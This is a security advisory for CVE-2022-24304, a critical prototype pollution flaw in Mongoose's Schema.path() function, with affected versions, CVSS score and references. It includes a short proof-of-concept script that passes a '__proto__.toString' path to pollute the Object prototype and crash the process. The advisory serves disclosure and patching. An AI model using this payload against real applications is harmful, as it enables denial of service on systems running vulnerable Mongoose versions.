CVE-2022-24304
CRITICAL9.8Mongoose Vulnerable to Prototype Pollution in Schema Object
Description
### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment. Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack. ### Proof of Concept ```js // poc.js const mongoose = require('mongoose'); const schema = new mongoose.Schema(); malicious_payload = '__proto__.toString' schema.path(malicious_payload, [String]) x = {} console.log(x.toString()) // crashed (Denial of service (DoS) attack) ``` ### Impact This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.
Affected packages (1)
- npm/mongoose>= 6.0.0, < 6.4.6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2022-24304
- WEBhttps://github.com/Automattic/mongoose/blob/51e758541763b6f14569744ced15cc23ab8b50c6/lib/schema.js#L88-L141
- WEBhttps://github.com/Automattic/mongoose/commit/6a197316564742c0422309e1b5fecfa4faec126e
- WEBhttps://github.com/Automattic/mongoose/commit/a45cfb6b0ce0067ae9794cfa80f7917e1fb3c6f8
- WEBhttps://github.com/Automattic/mongoose/issues/12085
- WEBhttps://huntr.dev/bounties/055be524-9296-4b2f-b68d-6d5b810d1ddd